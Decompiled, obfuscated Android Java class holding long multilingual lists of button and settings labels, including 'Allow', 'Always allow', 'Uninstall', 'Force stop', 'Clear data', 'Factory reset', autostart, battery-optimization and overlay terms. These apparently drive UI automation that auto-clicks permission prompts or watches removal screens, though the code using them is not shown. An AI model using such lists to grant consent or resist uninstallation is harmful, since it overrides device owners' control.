package p000;

import java.util.List;
import java.util.Locale;
import kotlin.text.AbstractC0779a1;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public abstract class dh0 {

    /* renamed from: a0 */
    public static final List f55750a0 = AbstractC0716jf.m213306g5("允许", "允許", "許可", "許可する", "許可", "허용", "Cho phép", "อนุญาต", "Izinkan", "Memungkinkan", "Benarkan", "Membenarkan", "Payagan", "ခွင့်ပြု", "ခွင့်ပြုရန်", "អនុញ្ញាត", "ອະນຸຍາດ", "अनुमति दें", "अनुमति", "অনুমতি দিন", "অনুমতি", "اجازت دیں", "اجازت", "अनुमति दिनुहोस्", "අවසර දෙන්න", "ፍቀድ", "ஆக்கு", "అనుమతి", "ಅನುಮತಿ", "അനുവദിക്കുക", "परवानगी", "પરવાનગી", "ਇਜਾਜ਼ਤ ਦਿਓ", "السماح", "تسمح", "לאפשר", "כן, זה בסדר", "اجازه", "ارزیابی\u200cشده", "İzin ver", "İzin Ver", "Allow", "Autoriser", "Permitir", "Permitir", "Consenti", "Consentire", "Zulassen", "Toestaan", "Tillåt", "Tillåta", "Tillat", "Tillate", "Tillad", "Salli", "Разрешить", "Дозволити", "Дозвол.", "Zezwól", "Pozwól", "Povolit", "Povoliť", "Engedélyezés", "Engedélyez", "Permite", "Να επιτρέπεται", "Επιτρέπω", "Разрешаване", "Позволете", "Ruhusu", "Dopusti", "Dovoli", "Leisti", "Atļaut", "Luba", "Дозволи");

    /* renamed from: a1 */
    public static final List f55751a1 = AbstractC0716jf.m213306g5("启用", "開啟", "有効にする", "사용", "사용하다", "Bật", "เปิดใช้งาน", "Aktifkan", "Fungsikan", "सक्षम करें", "يُمكّن", "הפוך לזמין", "Lütfen etkinleştir", "Enable", "Activer", "Habilitar", "Ativar", "Abilitare", "Aktivieren", "Activeren", "Aktivera", "Aktivere", "Ottaa käyttöön", "Включить", "Włączyć", "Zapnout", "Aktivovať", "Engedélyez", "Activa", "Активиране", "Ενεργοποιώ", "Aktivirati", "Vključiti", "Aktyvinti", "Aktivizēt", "Aktiveer", "Washa");

    /* renamed from: a2 */
    public static final List f55752a2 = AbstractC0716jf.m213306g5("确定", "确认", "好", "好的", "知道了", "我知道了", "確定", "確認", "OK", "はい", "了解", "확인", "예", "Đồng ý", "ตกลง", "ใช่", "Oke", "OKE", "Ya", "Baik", "Ya", "Oo", "ဟုတ်ကဲ့", "យល់ព្រម", "ຕົກລົງ", "ठीक है", "हां", "ঠিক আছে", "হ্যাঁ", "ٹھیک ہے", "ठिक छ", "හරි", "እሺ", "حسنًا", "حسنا", "نعم", "موافق", "אישור", "כן", "تأیید", "باشه", "بله", "Tamam", "Evet", "OK", "Yes", "Confirm", "Done", "Got it", "Oui", "Confirmer", "Terminé", "Aceptar", "Sí", "Confirmar", "Hecho", "Sim", "Confirmar", "Concluído", "Ok", "Sì", "Conferma", "Fatto", "Ja", "Bestätigen", "Fertig", "Ja", "Bevestigen", "Klaar", "Ja", "Bekräfta", "Klar", "Ja", "Bekreft", "Ferdig", "Ja", "Bekræft", "Færdig", "Kyllä", "Vahvista", "ОК", "Да", "Подтвердить", "Готово", "Так", "Підтвердити", "Готово", "Tak", "Potwierdź", "Gotowe", "Ano", "Potvrdit", "Hotovo", "Áno", "Potvrdiť", "Hotovo", "Igen", "Megerősít", "Kész", "Da", "Confirmă", "Gata", "Ναι", "Επιβεβαίωση", "Да", "Потвърди", "Готово", "Sawa", "Ndio", "Thibitisha", "Da", "Potvrdi", "Da", "Potrdi");

    /* renamed from: a3 */
    public static final List f55753a3 = AbstractC0716jf.m213306g5("取消", "否", "不", "拒绝", "取消", "否", "キャンセル", "いいえ", "취소", "아니오", "아니요", "Hủy", "Không", "ยกเลิก", "ไม่", "Batal", "Tidak", "Batal", "Kanselahin", "Hindi", "မလုပ်တော့", "បោះបង់", "ຍົກເລີກ", "रद्द करें", "नहीं", "বাতিল করুন", "বাতিল", "না", "منسوخ کریں", "منسوخ", "रद्द गर्नुहोस्", "අවලංගු කරන්න", "ይቅር", "إلغاء", "لا", "ביטול", "לא", "لغو", "خیر", "İptal", "Hayır", "Cancel", "No", "Deny", "Reject", "Annuler", "Non", "Refuser", "Cancelar", "No", "Denegar", "Cancelar", "Não", "Negar", "Annulla", "No", "Nega", "Abbrechen", "Nein", "Ablehnen", "Annuleren", "Nee", "Weigeren", "Avbryt", "Nej", "Neka", "Avbryt", "Nei", "Avslå", "Annuller", "Nej", "Afvis", "Peru", "Peruuta", "Ei", "Kieltää", "Отмена", "Нет", "Отклонить", "Скасувати", "Ні", "Відхилити", "Anuluj", "Nie", "Odmów", "Zrušit", "Ne", "Odmítnout", "Zrušiť", "Nie", "Odmietnuť", "Mégse", "Nem", "Elutasít", "Anulează", "Nu", "Refuză", "Ακύρωση", "Όχι", "Отказ", "Отмени", "Не", "Откажи", "Ghairi", "Hapana", "Kataa");

    /* renamed from: a4 */
    public static final List f55754a4 = AbstractC0716jf.m213306g5("卸载", "移除", "删除", "停用", "禁用", "卸載", "移除", "刪除", "停用", "禁用", "アンインストール", "削除", "無効化", "제거", "삭제", "사용 중지", "Gỡ cài đặt", "Xóa", "ถอนการติดตั้ง", "ลบ", "Copot pemasangan", "Hapus", "Nyahpasang", "Padam", "अनइंस्टॉल", "हटाएं", "আনইনস্টল", "মুছে ফেলুন", "إلغاء التثبيت", "حذف", "إزالة", "הסר התקנה", "מחק", "Kaldır", "Sil", "Uninstall", "Remove", "Delete", "Disable", "Désinstaller", "Supprimer", "Désactiver", "Desinstalar", "Eliminar", "Deshabilitar", "Desinstalar", "Remover", "Desativar", "Disinstalla", "Rimuovi", "Disabilita", "Deinstallieren", "Entfernen", "Deaktivieren", "Verwijderen", "Uitschakelen", "Avinstallera", "Ta bort", "Inaktivera", "Avinstaller", "Fjern", "Deaktiver", "Fjern", "Slet", "Deaktiver", "Poista", "Poista käytöstä", "Удалить", "Деинсталляция", "Отключить", "Odinstaluj", "Usuń", "Wyłącz", "Odinstalovat", "Odstranit", "Zakázat", "Odinštalovať", "Odstrániť", "Zakázať", "Eltávolítás", "Törlés", "Letiltás", "Dezinstalare", "Șterge", "Dezactivare", "Деинсталиране", "Изтрий", "Деактивиране", "Видалити", "Вимкнути", "Κατάργηση", "Διαγραφή", "Deinstaliraj", "Ukloni", "Odstranitev", "Onemogoči", "Pašalinti", "Išjungti", "Atinstalēt", "Dzēst", "Desinstallimine", "Kustuta", "Ondoa", "Futa");

    /* renamed from: a5 */
    public static final List f55755a5 = AbstractC0716jf.m213306g5("从桌面移除", "从桌面删除", "從桌面移除", "從桌面刪除", "ホーム画面から削除", "ホームから削除", "홈 화면에서 삭제", "홈에서 삭제", "Xóa khỏi Màn hình chính", "ลบออกจากหน้าจอหลัก", "Hapus dari Layar utama", "Alih keluar daripada Skrin utama", "होम स्क्रीन से हटाएं", "হোম স্ক্রিন থেকে সরান", "إزالة من الشاشة الرئيسية", "הסר ממסך הבית", "Ana ekrandan kaldır", "Remove from Home screen", "Remove from home screen", "Supprimer de l'écran d'accueil", "Quitar de la pantalla de inicio", "Remover da tela inicial", "Rimuovi dalla schermata Home", "Vom Startbildschirm entfernen", "Verwijderen van startscherm", "Ta bort från startskärmen", "Fjern fra startskjermen", "Fjern fra startskærmen", "Poista aloitusnäytöltä", "Удалить с главного экрана", "Usuń z ekranu głównego", "Odebrat z plochy", "Odstrániť z plochy", "Eltávolítás a kezdőképernyőről", "Eliminați de pe ecranul de pornire", "Премахване от началния екран", "Видалити з головного екрана", "Κατάργηση από αρχική οθόνη", "Ukloni s početnog zaslona", "Odstrani z začetnega zaslona", "Pašalinti iš pagrindinio ekrano", "Noņemt no sākuma ekrāna", "Eemalda avakuvalt");

    /* renamed from: a6 */
    public static final List f55756a6 = AbstractC0716jf.m213306g5("重置", "重置选项", "恢复出厂", "出厂设置", "清除所有数据", "重設", "重設選項", "恢復原廠", "清除所有資料", "リセット", "初期化", "すべてのデータを消去", "재설정", "초기화", "모든 데이터 삭제", "Đặt lại", "Khôi phục cài đặt gốc", "รีเซ็ต", "รีเซ็ตเป็นค่าเริ่มต้น", "Setel ulang", "Reset pabrik", "Tetapkan semula", "Tetapan kilang", "रीसेट", "रीसेट विकल्प", "फ़ैक्टरी रीसेट", "রিসেট", "ফ্যাক্টরি রিসেট", "إعادة ضبط", "خيارات إعادة الضبط", "إعادة ضبط المصنع", "איפוס", "איפוס להגדרות היצרן", "Sıfırla", "Fabrika ayarlarına sıfırla", "Reset", "Reset options", "Factory reset", "Erase all data", "Réinitialisation", "Réinitialiser", "Effacer toutes", "Restablecer", "Restablecimiento", "Borrar todo", "Redefinir", "Restaurar", "Apagar tudo", "Ripristina", "Reimpostazione", "Cancella tutto", "Zurücksetzen", "Auf Werkseinstellungen", "Resetten", "Fabrieksinstellingen", "Alles wissen", "Återställ", "Återställningsalternativ", "Fabriksåterställning", "Tilbakestill", "Tilbakestill alternativer", "Fabrikkinnstilling", "Nulstil", "Gendan fabriksindstillinger", "Palauta", "Palautusvalinnat", "Tehdasasetukset", "Сброс", "Сбросить", "Сброс настроек", "Стереть все", "Resetuj", "Opcje resetowania", "Przywróć ustawienia", "Obnovit", "Možnosti obnovení", "Vymazat vše", "Obnoviť", "Možnosti obnovenia", "Vymazať všetko", "Visszaállít", "Visszaállítási lehetőségek", "Gyári", "Resetare", "Opțiuni de resetare", "Șterge tot", "Нулиране", "Опции за нулиране", "Изтрий всичко", "Скинути", "Скидання", "Видалити все", "Επαναφορά", "Επιλογές επαναφοράς", "Resetiraj", "Opcije resetiranja", "Ponastavi", "Možnosti ponastavitve", "Atstatyti", "Atstatymo parinktys", "Atiestatīt", "Atiestatīšanas iespējas", "Lähtesta", "Lähtestamise valikud");

    /* renamed from: a7 */
    public static final List f55757a7;

    /* renamed from: a8 */
    public static final List f55758a8;

    /* renamed from: a9 */
    public static final List f55759a9;

    /* renamed from: b0 */
    public static final List f55760b0;

    /* renamed from: b1 */
    public static final List f55761b1;

    /* renamed from: b2 */
    public static final List f55762b2;

    /* renamed from: b3 */
    public static final List f55763b3;

    /* renamed from: b4 */
    public static final List f55764b4;

    /* renamed from: b5 */
    public static final List f55765b5;

    /* renamed from: b6 */
    public static final List f55766b6;

    /* renamed from: b7 */
    public static final List f55767b7;

    /* renamed from: b8 */
    public static final List f55768b8;

    /* renamed from: b9 */
    public static final List f55769b9;

    /* renamed from: c0 */
    public static final List f55770c0;

    /* renamed from: c1 */
    public static final List f55771c1;

    /* renamed from: c2 */
    public static final List f55772c2;

    /* renamed from: c3 */
    public static final List f55773c3;

    /* renamed from: c4 */
    public static final List f55774c4;

    /* renamed from: c5 */
    public static final List f55775c5;

    /* renamed from: c6 */
    public static final List f55776c6;

    /* renamed from: c7 */
    public static final List f55777c7;

    /* renamed from: c8 */
    public static final List f55778c8;

    /* renamed from: c9 */
    public static final List f55779c9;

    /* renamed from: d0 */
    public static final List f55780d0;

    /* renamed from: d1 */
    public static final List f55781d1;

    /* renamed from: d2 */
    public static final List f55782d2;

    /* renamed from: d3 */
    public static final List f55783d3;

    /* renamed from: d4 */
    public static final List f55784d4;

    /* renamed from: d5 */
    public static final List f55785d5;

    /* renamed from: d6 */
    public static final List f55786d6;

    /* renamed from: d7 */
    public static final List f55787d7;

    /* renamed from: d8 */
    public static final List f55788d8;

    /* renamed from: d9 */
    public static final List f55789d9;

    /* renamed from: e0 */
    public static final List f55790e0;

    /* renamed from: e1 */
    public static final List f55791e1;

    /* renamed from: e2 */
    public static final List f55792e2;

    /* renamed from: e3 */
    public static final List f55793e3;

    /* renamed from: e4 */
    public static final List f55794e4;

    /* renamed from: e5 */
    public static final List f55795e5;

    /* renamed from: e6 */
    public static final List f55796e6;

    /* renamed from: e7 */
    public static final List f55797e7;

    /* renamed from: e8 */
    public static final List f55798e8;

    /* renamed from: e9 */
    public static final List f55799e9;

    /* renamed from: f0 */
    public static final List f55800f0;

    /* renamed from: f1 */
    public static final List f55801f1;

    /* renamed from: f2 */
    public static final List f55802f2;

    /* renamed from: f3 */
    public static final List f55803f3;

    /* renamed from: f4 */
    public static final List f55804f4;

    /* renamed from: f5 */
    public static final List f55805f5;

    /* renamed from: f6 */
    public static final List f55806f6;

    /* renamed from: f7 */
    public static final List f55807f7;

    /* renamed from: f8 */
    public static final List f55808f8;

    /* renamed from: f9 */
    public static final List f55809f9;

    /* renamed from: g0 */
    public static final List f55810g0;

    /* renamed from: g1 */
    public static final List f55811g1;

    /* renamed from: g2 */
    public static final List f55812g2;

    /* renamed from: g3 */
    public static final List f55813g3;

    /* renamed from: g4 */
    public static final List f55814g4;

    /* renamed from: g5 */
    public static final List f55815g5;

    /* renamed from: g6 */
    public static final List f55816g6;

    static {
        AbstractC0716jf.m213306g5("开", "已开启", "已启用", "允许", "开启", "開", "已開啟", "已啟用", "允許", "オン", "有効", "켬", "사용 중", "허용됨", "Bật", "Đang bật", "เปิด", "เปิดอยู่", "Aktif", "Hidup", "Hidupkan", "Aktif", "चालू", "सक्षम", "চালু", "সক্রিয়", "تشغيل", "مفعل", "מופעל", "פעיל", "Açık", "Etkin", "On", "ON", "Enabled", "Allow", "Allowed", "Active", "Activé", "Autorisé", "Activado", "Permitido", "Ativado", "Permitido", "Attivo", "Abilitato", "An", "Ein", "Aktiviert", "Erlaubt", "Aan", "Ingeschakeld", "Toegestaan", "På", "Aktiverad", "Tillåten", "På", "Aktivert", "Tillatt", "Til", "Aktiveret", "Tilladt", "Päällä", "Käytössä", "Sallittu", "Вкл", "Включено", "Разрешено", "Wł", "Włączone", "Dozwolone", "Zapnuto", "Povoleno", "Zapnuté", "Povolené", "Be", "Engedélyezve", "Pornit", "Activat", "Permis", "Вкл", "Активирано", "Позволено", "Увімк", "Увімкнено", "Дозволено");
        AbstractC0716jf.m213306g5("关", "关闭", "已关闭", "禁止", "已禁用", "關", "關閉", "已關閉", "禁止", "已禁用", "オフ", "無効", "끔", "사용 안 함", "거부됨", "Tắt", "Đang tắt", "ปิด", "ปิดอยู่", "Nonaktif", "Mati", "Matikan", "Tidak aktif", "बंद", "अक्षम", "বন্ধ", "নিষ্ক্রিয়", "إيقاف", "معطل", "מושבת", "כבוי", "Kapalı", "Devre dışı", "Off", "OFF", "Disabled", "Deny", "Denied", "Inactive", "Désactivé", "Refusé", "Desactivado", "Denegado", "Desativado", "Negado", "Disattivo", "Disabilitato", "Aus", "Deaktiviert", "Abgelehnt", "Uit", "Uitgeschakeld", "Geweigerd", "Av", "Inaktiverad", "Nekad", "Av", "Deaktivert", "Avslått", "Fra", "Deaktiveret", "Afvist", "Pois", "Pois käytöstä", "Estetty", "Выкл", "Выключено", "Запрещено", "Wył", "Wyłączone", "Odmówiono", "Vypnuto", "Zakázáno", "Vypnuté", "Zakázané", "Ki", "Letiltva", "Oprit", "Dezactivat", "Refuzat", "Изкл", "Деактивирано", "Отказано", "Вимк", "Вимкнено", "Заборонено");
        AbstractC0716jf.m213306g5("自启动", "自动启动", "开机启动", "启动管理", "应用启动管理", "自啟動", "自動啟動", "開機啟動", "啟動管理", "自動起動", "スタートアップ", "자동 시작", "시작 관리", "Auto-start", "Autostart", "Auto start", "Startup", "Boot startup", "Auto-run", "Autorun", "Start on boot", "Démarrage automatique", "Inicio automático", "Inicialização automática", "Avvio automatico", "Autostart", "Automatisch starten", "Автозапуск", "Autostart", "Automatické spuštění", "Automatikus indítás", "Автозапуск", "Pornire automată", "Αυτόματη εκκίνηση", "เริ่มต้นอัตโนมัติ", "Tự khởi động", "Mulai otomatis", "Mula automatik", "स्वतः प्रारंभ", "ऑटो स्टार्ट", "স্বয়ংক্রিয় শুরু", "تشغيل تلقائي", "הפעלה אוטומטית", "Otomatik başlatma", "Autostart", "Automaattinen käynnistys");
        AbstractC0716jf.m213306g5("后台运行", "后台管理", "后台弹窗", "后台弹出界面", "允许后台活动", "後台運行", "後台管理", "後台彈窗", "バックグラウンド", "バックグラウンド実行", "백그라운드", "백그라운드 실행", "백그라운드 관리", "Background", "Background running", "Background activity", "Run in background", "Background pop-up", "Background permission", "Arrière-plan", "Segundo plano", "Sfondo", "Hintergrund", "Achtergrond", "Фоновый режим", "Фон", "W tle", "Pozadí", "Háttér", "Фоновий режим", "Fundal", "Παρασκήνιο", "พื้นหลัง", "ทำงานเบื้องหลัง", "Nền", "Chạy nền", "Latar belakang", "पृष्ठभूमि", "बैकग्राउंड", "পটভূমি", "الخلفية", "تشغيل في الخلفية", "רקע", "Arka plan", "Bakgrund", "Bakgrunn", "Baggrund", "Tausta");
        AbstractC0716jf.m213306g5("电池", "电池优化", "省电", "省电模式", "耗电", "后台高耗电", "不受限制", "无限制", "允许后台活动", "電池", "電池優化", "省電", "省電模式", "耗電", "バッテリー", "電池", "省電力", "배터리", "배터리 최적화", "절전", "Battery", "Battery optimization", "Battery saver", "Power saving", "No restrictions", "Unrestricted", "Don't optimize", "Not optimized", "Batterie", "Économie d'énergie", "Batería", "Ahorro de energía", "Bateria", "Economia de energia", "Batteria", "Risparmio energetico", "Akku", "Batterie", "Energiesparen", "Batterij", "Energiebesparing", "Батарея", "Оптимизация батареи", "Энергосбережение", "Bateria", "Oszczędzanie energii", "Baterie", "Úspora energie", "Akkumulátor", "Energiatakarékos", "Батарея", "Оптимізація батареї", "Baterie", "Economisire baterie", "Μπαταρία", "Εξοικονόμηση ενέργειας", "แบตเตอรี่", "ประหยัดแบตเตอรี่", "Pin", "Tiết kiệm pin", "Baterai", "Hemat baterai", "Bateri", "Jimat bateri", "बैटरी", "बैटरी ऑप्टिमाइज़ेशन", "ব্যাটারি", "البطارية", "توفير الطاقة", "סוללה", "חיסכון בסוללה", "Pil", "Pil tasarrufu", "Pil optimizasyonu", "Batteri", "Batteribesparing", "Akku", "Virransäästö");
        AbstractC0716jf.m213306g5("通知", "通知管理", "通知权限", "推送通知", "应用通知", "通知", "通知管理", "通知權限", "推送通知", "通知", "プッシュ通知", "알림", "알림 관리", "푸시 알림", "Notification", "Notifications", "Notification management", "Push notification", "App notifications", "Notifications", "Notificaciones", "Notificações", "Notifiche", "Benachrichtigungen", "Meldingen", "Уведомления", "Powiadomienia", "Oznámení", "Értesítések", "Сповіщення", "Notificări", "Ειδοποιήσεις", "การแจ้งเตือน", "Thông báo", "Notifikasi", "Pemberitahuan", "सूचनाएं", "नोटिफिकेशन", "বিজ্ঞপ্তি", "الإشعارات", "התראות", "Bildirimler", "Aviseringar", "Varsler", "Notifikationer", "Ilmoitukset");
        AbstractC0716jf.m213306g5("悬浮窗", "悬浮窗权限", "显示在其他应用上层", "显示在其他应用的上层", "在其他应用上层显示", "浮窗", "浮动窗口", "懸浮窗", "顯示在其他應用上層", "浮動窗口", "オーバーレイ", "他のアプリの上に表示", "오버레이", "다른 앱 위에 표시", "Overlay", "Display over other apps", "Appear on top", "Draw over other apps", "Float window", "Floating window", "Superposition", "Afficher par-dessus", "Mostrar encima de otras apps", "Sobrepor a outros apps", "Sovrapposizione", "Visualizza sopra altre app", "Über anderen Apps einblenden", "Bovenop andere apps weergeven", "Поверх других приложений", "Наложение", "Nakładanie", "Wyświetlanie nad innymi", "Překrytí", "Átfedés", "Megjelenítés más alkalmazások felett", "Поверх інших додатків", "Suprapunere", "Επικάλυψη", "แสดงทับแอปอื่น", "วางซ้อนทับ", "Hiển thị trên ứng dụng khác", "Tampilkan di atas aplikasi lain", "Papar di atas apl lain", "अन्य ऐप्स के ऊपर दिखाएं", "ओवरले", "অন্য অ্যাপের উপরে দেখান", "العرض فوق التطبيقات الأخرى", "הצגה מעל אפליקציות אחרות", "Diğer uygulamaların üzerinde göster", "Visa ovanpå andra appar", "Vis over andre apper", "Vis ovenpå andre apps", "Näytä muiden sovellusten päällä");
        f55757a7 = AbstractC0716jf.m213306g5("应用", "应用管理", "应用和服务", "应用与权限", "权限管理", "应用信息", "全部应用", "应用列表", "應用", "應用管理", "應用和服務", "權限管理", "アプリ", "アプリ管理", "権限管理", "앱", "앱 관리", "앱 및 서비스", "권한 관리", "App", "Apps", "Application", "Applications", "App info", "App management", "App permissions", "Apps & services", "Permissions", "Permission manager", "Applications", "Gestion des applications", "Aplicaciones", "Gestión de aplicaciones", "Aplicativos", "Gerenciador de apps", "Applicazioni", "Gestione app", "Apps", "App-Verwaltung", "Berechtigungen", "Apps", "App-beheer", "Machtigingen", "Приложения", "Управление приложениями", "Разрешения", "Aplikacje", "Zarządzanie aplikacjami", "Uprawnienia", "Aplikace", "Správa aplikací", "Oprávnění", "Alkalmazások", "Alkalmazáskezelő", "Engedélyek", "Додатки", "Керування додатками", "Дозволи", "Aplicații", "Gestionare aplicații", "Permisiuni", "Εφαρμογές", "Διαχείριση εφαρμογών", "Δικαιώματα", "แอป", "จัดการแอป", "สิทธิ์", "Ứng dụng", "Quản lý ứng dụng", "Quyền", "Aplikasi", "Manajemen aplikasi", "Izin", "Apl", "Pengurusan apl", "Kebenaran", "ऐप्स", "ऐप प्रबंधन", "अनुमतियां", "অ্যাপ", "অ্যাপ পরিচালনা", "অনুমতি", "التطبيقات", "إدارة التطبيقات", "الأذونات", "אפליקציות", "ניהול אפליקציות", "הרשאות", "Uygulamalar", "Uygulama yönetimi", "İzinler", "Appar", "Apphantering", "Behörigheter", "Apper", "Appadministrasjon", "Tillatelser", "Apps", "Appstyring", "Tilladelser", "Sovellukset", "Sovellusten hallinta", "Käyttöoikeudet");
        f55758a8 = AbstractC0716jf.m213306g5("仅使用期间允许", "本次使用允许", "允许本次使用", "使用期间允许", "仅在使用中允许", "使用时允许", "仅在使用该应用时允许", "使用应用时允许", "仅此一次", "仅限这一次", "本次使用时允许", "仅在前台使用应用时允许", "僅在使用期間允許", "使用時允許", "僅此一次", "While using the app", "Only this time", "Allow only while using", "While using", "Only while using the app", "Just this once", "Allow while using the app", "While app is in use", "Allow only while using the app", "アプリの使用中のみ許可", "今回のみ", "使用中のみ", "앱 사용 중에만 허용", "이번만 허용", "사용 중에만", "Chỉ khi dùng ứng dụng", "Chỉ lần này", "ขณะใช้แอปเท่านั้น", "เฉพาะครั้งนี้", "Hanya saat menggunakan aplikasi", "Hanya kali ini", "Hanya semasa menggunakan apl", "Kali ini sahaja", "Habang ginagamit ang app", "Sa pagkakataong ito lang", "ऐप इस्तेमाल करते समय ही अनुमति दें", "केवल इस बार", "শুধু অ্যাপ ব্যবহারকালে", "শুধু এবার", "صرف ایپ استعمال کے دوران", "أثناء استخدام التطبيق فقط", "هذه المرة فقط", "רק בזמן שימוש באפליקציה", "רק הפעם", "فقط هنگام استفاده از برنامه", "Yalnızca uygulamayı kullanırken", "Yalnızca bu kez", "Uniquement si l'appli est en cours d'utilisation", "Uniquement cette fois", "Solo mientras se usa la app", "Solo esta vez", "Apenas enquanto estiver usando o app", "Só desta vez", "Solo durante l'utilizzo dell'app", "Solo questa volta", "Nur während der Nutzung der App zulassen", "Nur dieses Mal", "Alleen tijdens gebruik van app", "Alleen deze keer", "Bara medan appen används", "Bara den här gången", "Bare mens appen brukes", "Bare denne gangen", "Kun mens appen er i brug", "Kun denne gang", "Vain sovellusta käytettäessä", "Vain tällä kertaa", "Только при использовании приложения", "Только сейчас", "Tylko podczas korzystania z aplikacji", "Tylko tym razem", "Pouze při používání aplikace", "Pouze tentokrát", "Iba počas používania aplikácie", "Iba teraz", "Csak az alkalmazás használatakor", "Csak most", "Doar cât timp folosiți aplicația", "Doar de data aceasta", "Само при ползване на приложението", "Лише під час використання додатка", "Лише цього разу", "Μόνο κατά τη χρήση της εφαρμογής", "Samo dok se koristi aplikacija");
        f55759a9 = AbstractC0716jf.m213306g5("始终允许", "总是允许", "一律允许", "永久允许", "始終允許", "總是允許", "Always allow", "Allow always", "Allow all the time", "Always", "Allow anytime", "常に許可", "常に", "항상 허용", "항상", "Luôn cho phép", "อนุญาตตลอด", "อนุญาตเสมอ", "Selalu izinkan", "Izinkan sepanjang waktu", "Sentiasa benarkan", "Palaging payagan", "हमेशा अनुमति दें", "সবসময় অনুমতি দিন", "ہمیشہ اجازت دیں", "السماح دائمًا", "السماح طوال الوقت", "לאפשר תמיד", "همیشه اجازه بده", "Her zaman izin ver", "Toujours autoriser", "Permitir siempre", "Permitir sempre", "Consenti sempre", "Immer zulassen", "Altijd toestaan", "Tillåt alltid", "Alltid tillat", "Tillad altid", "Salli aina", "Всегда разрешать", "Zawsze zezwalaj", "Vždy povolit", "Vždy povoliť", "Mindig engedélyezze", "Permite întotdeauna", "Винаги разрешавай", "Завжди дозволяти", "Να επιτρέπεται πάντα", "Uvijek dopusti");
        f55760b0 = AbstractC0716jf.m213306g5("停用", "禁用", "停用", "禁用", "無効にする", "無効化", "사용 중지", "비활성화", "Tắt", "Vô hiệu hóa", "ปิดใช้งาน", "ปิดการใช้งาน", "Nonaktifkan", "Matikan", "Lumpuhkan", "Nyahaktifkan", "I-disable", "अक्षम करें", "बंद करें", "অক্ষম করুন", "غیر فعال کریں", "إيقاف", "تعطيل", "השבתה", "השבת", "غیرفعال کردن", "Devre dışı bırak", "Disable", "Turn off", "Désactiver", "Inhabilitar", "Desactivar", "Deshabitar", "Desativar", "Desabilitar", "Disattiva", "Disabilita", "Deaktivieren", "Uitschakelen", "Inaktivera", "Deaktiver", "Poista käytöstä", "Отключить", "Выключить", "Wyłącz", "Zakázat", "Deaktivovat", "Zakázať", "Deaktivovať", "Letiltás", "Kikapcsolás", "Dezactivare", "Dezactivați", "Деактивиране", "Изключване", "Вимкнути", "Деактивувати", "Απενεργοποίηση", "Onemogući");
        f55761b1 = AbstractC0716jf.m213306g5("停用应用", "禁用应用", "停用应用程序", "禁用应用程序", "確定停用", "確定禁用", "アプリを無効にする", "앱 사용 중지", "Vô hiệu hóa ứng dụng", "ปิดใช้งานแอป", "ปิดการใช้งานแอป", "Nonaktifkan aplikasi", "Lumpuhkan apl", "Nyahaktifkan apl", "I-disable ang app", "ऐप्लिकेशन अक्षम करें", "ऐप बंद करें", "অ্যাপ অক্ষম করুন", "ایپ غیر فعال کریں", "تعطيل التطبيق", "إيقاف التطبيق", "השבת אפליקציה", "غیرفعال کردن برنامه", "Uygulamayı devre dışı bırak", "Disable app", "Désactiver l'application", "Inhabilitar aplicación", "Desactivar aplicación", "Desativar app", "Desativar aplicativo", "Disattiva app", "App deaktivieren", "App uitschakelen", "Inaktivera app", "Deaktiver app", "Poista sovellus käytöstä", "Отключить приложение", "Wyłącz aplikację", "Zakázat aplikaci", "Zakázať aplikáciu", "Alkalmazás letiltása", "Dezactivați aplicația", "Деактивиране на приложение", "Вимкнути додаток", "Απενεργοποίηση εφαρμογής", "Onemogući aplikaciju", "确定", "确认", "OK", "Ok");
        f55762b2 = AbstractC0716jf.m213306g5("强制停止", "强行停止", "结束运行", "強制停止", "強行停止", "強制停止", "강제 중지", "강제 종료", "Buộc dừng", "บังคับหยุด", "Paksa berhenti", "Hentikan paksa", "Paksa berhenti", "Puwersahang itigil", "ज़बरदस्ती रोकें", "बलपूर्वक रोकें", "জোর করে বন্ধ করুন", "زبردستی روکیں", "فرض الإيقاف", "إيقاف إجباري", "עצירה מאולצת", "توقف اجباری", "Durmaya zorla", "Force stop", "Force-stop", "Forcer l'arrêt", "Forzar detención", "Forzar cierre", "Forçar parada", "Forçar interrupção", "Arresto forzato", "Forza interruzione", "Beenden erzwingen", "Stopp erzwingen", "Geforceerd stoppen", "Tvinga stopp", "Tvångsavsluta", "Tving stopp", "Tving til at stoppe", "Gennemtving stop", "Pakota pysäytys", "Остановить", "Принудительная остановка", "Принудительно остановить", "Wymuś zatrzymanie", "Vynutit zastavení", "Vynútiť zastavenie", "Kényszerített leállítás", "Leállítás kényszerítése", "Oprire forțată", "Forțare oprire", "Принудително спиране", "Примусово зупинити", "Αναγκαστική διακοπή", "Prisilno zaustavi");
        f55763b3 = AbstractC0716jf.m213306g5("清除数据", "清除存储", "清除缓存", "清空数据", "清除資料", "清除儲存空間", "清除快取", "データを消去", "ストレージを消去", "キャッシュを削除", "데이터 삭제", "저장공간 비우기", "캐시 삭제", "Xóa dữ liệu", "Xóa bộ nhớ", "ล้างข้อมูล", "ล้างที่เก็บข้อมูล", "Hapus data", "Hapus penyimpanan", "Kosongkan data", "Kosongkan storan", "I-clear ang data", "डेटा साफ़ करें", "मेमोरी खाली करें", "ডেটা সাফ করুন", "স্টোরেজ সাফ করুন", "ڈیٹا صاف کریں", "محو البيانات", "مسح مساحة التخزين", "ניקוי נתונים", "ניקוי אחסון", "پاک کردن داده\u200cها", "Verileri temizle", "Depolamayı temizle", "Clear data", "Clear storage", "Clear cache", "Effacer les données", "Effacer le stockage", "Borrar datos", "Borrar almacenamiento", "Limpar dados", "Limpar armazenamento", "Cancella dati", "Cancella archivio", "Daten löschen", "Speicher löschen", "Gegevens wissen", "Opslag wissen", "Rensa data", "Rensa lagring", "Tøm data", "Tøm lagring", "Ryd data", "Ryd lager", "Tyhjennä tiedot", "Tyhjennä tallennustila", "Очистить данные", "Очистить хранилище", "Wyczyść dane", "Wyczyść pamięć", "Vymazat data", "Vymazat úložiště", "Vymazať údaje", "Vymazať úložisko", "Adatok törlése", "Tárhely törlése", "Șterge datele", "Golire spațiu de stocare", "Изчистване на данните", "Изтрий данните", "Очистити дані", "Очистити сховище", "Εκκαθάριση δεδομένων", "Εκκαθάριση αποθηκευτικού χώρου", "Očisti podatke", "Očisti pohranu");
